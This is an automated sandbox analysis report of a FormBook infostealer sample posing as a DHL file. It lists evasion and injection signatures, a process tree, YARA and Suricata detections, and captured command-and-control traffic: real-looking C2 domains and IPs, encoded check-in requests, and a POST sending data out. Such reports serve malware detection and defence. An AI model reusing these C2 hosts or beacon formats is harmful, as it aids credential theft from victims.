
Windows Analysis Report
rDHL8350232025-2.exe

Overview

General Information

Sample name: rDHL8350232025-2.exe
Analysis ID: 1585371
MD5: 6f732c7020a0eba292610a19133b3178
SHA1: f2ea127e9532671903a402a896269f8cd44308ed
SHA256: 0fcc36b8e2936fa3fcbc8b618a9033832eb9a833dacd014fc2849c953ac8b7e2
Tags: exe, user-Porcupine
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rDHL8350232025-2.exe (PID: 5800 cmdline: "C:\Users\user\Desktop\rDHL8350232025-2.exe" MD5: 6F732C7020A0EBA292610A19133B3178)
    • svchost.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\rDHL8350232025-2.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • qSVRmrwLYsrJTsNjTGrEW.exe (PID: 3576 cmdline: "C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 5760 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • qSVRmrwLYsrJTsNjTGrEW.exe (PID: 3724 cmdline: "C:\Program Files (x86)\AlNMPHsDlGcbJSdYuksjzPglaBJsymIFyGRBeszidYxdgVqiaClWFgnyznjanHRHCYhkWiRpImj\qSVRmrwLYsrJTsNjTGrEW.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3116 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x50682:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x39d21:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ParentImage: C:\Users\user\Desktop\rDHL8350232025-2.exe, ParentProcessId: 5800, ParentProcessName: rDHL8350232025-2.exe, ProcessCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ProcessId: 1308, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ParentImage: C:\Users\user\Desktop\rDHL8350232025-2.exe, ParentProcessId: 5800, ParentProcessName: rDHL8350232025-2.exe, ProcessCommandLine: "C:\Users\user\Desktop\rDHL8350232025-2.exe", ProcessId: 1308, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2025-01-07T15:32:24.303849+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49736 | 154.215.72.110 | 80 | TCP
            2025-01-07T15:32:56.245059+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49933 | 116.50.37.244 | 80 | TCP
            2025-01-07T15:34:17.782006+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49984 | 85.159.66.93 | 80 | TCP
            2025-01-07T15:34:31.105080+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49988 | 91.195.240.94 | 80 | TCP
            2025-01-07T15:34:52.926156+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | TCP
            2025-01-07T15:35:06.336026+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49996 | 195.110.124.133 | 80 | TCP
            2025-01-07T15:35:35.872835+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50000 | 217.196.55.202 | 80 | TCP


            AV Detection

            barindex
            Source: rDHL8350232025-2.exeAvira: detected
            Source: http://www.techchains.info/fo8o/Avira URL Cloud: Label: malware
            Source: http://www.rssnewscast.com/fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==Avira URL Cloud: Label: malware
            Source: rDHL8350232025-2.exeReversingLabs: Detection: 52%
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Submitted SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: rDHL8350232025-2.exeJoe Sandbox ML: detected
            Source: rDHL8350232025-2.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000000.2074676354.000000000014E000.00000002.00000001.01000000.00000004.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000000.2220851276.000000000014E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rDHL8350232025-2.exe, 00000000.00000003.2010892583.00000000039D0000.00000004.00001000.00020000.00000000.sdmp, rDHL8350232025-2.exe, 00000000.00000003.2011959448.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2149235070.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061355887.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149235070.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2059839826.0000000003200000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000004.00000003.2151251292.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2149261496.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4462648577.0000000002F4E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: netbtugc.exe, 00000004.00000002.4461436648.000000000068E000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2441817012.000000003985C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000002.00000003.2117854997.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2149131877.0000000003000000.00000004.00000020.00020000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000003.00000003.2087754311.000000000115B000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0006C2A2 FindFirstFileExW,0_2_0006C2A2
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A68EE FindFirstFileW,FindClose,0_2_000A68EE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_000A698F
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D076
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0009D3A9
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A9642
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_000A979D
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_000A9B2B
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_0009DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0009DBBE
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000A5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_000A5C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0046BAB0 FindFirstFileW,FindNextFileW,FindClose,4_2_0046BAB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax4_2_00459480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi4_2_0045DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h4_2_00A4053E

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49736 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49933 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49996 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50000 -> 217.196.55.202:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49984 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49992 -> 66.29.149.46:80
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
            Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000ACE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_000ACE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FPJps=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&vVyTz=x4ZDmHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: global trafficDNS traffic detected: DNS query: www.shenzhoucui.com
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 206Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Ascii: FPJps=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO+yMgKUf7lnBSTXEEH5deQraU14cJZaPRWsUkX4=
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 07 Jan 2025 14:32:24 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 07 Jan 2025 14:32:48 GMTConnection: closeContent-Length: 315Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Tue, 07 Jan 2025 14:32:50 GMTConnection: closeContent-Length: 315Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
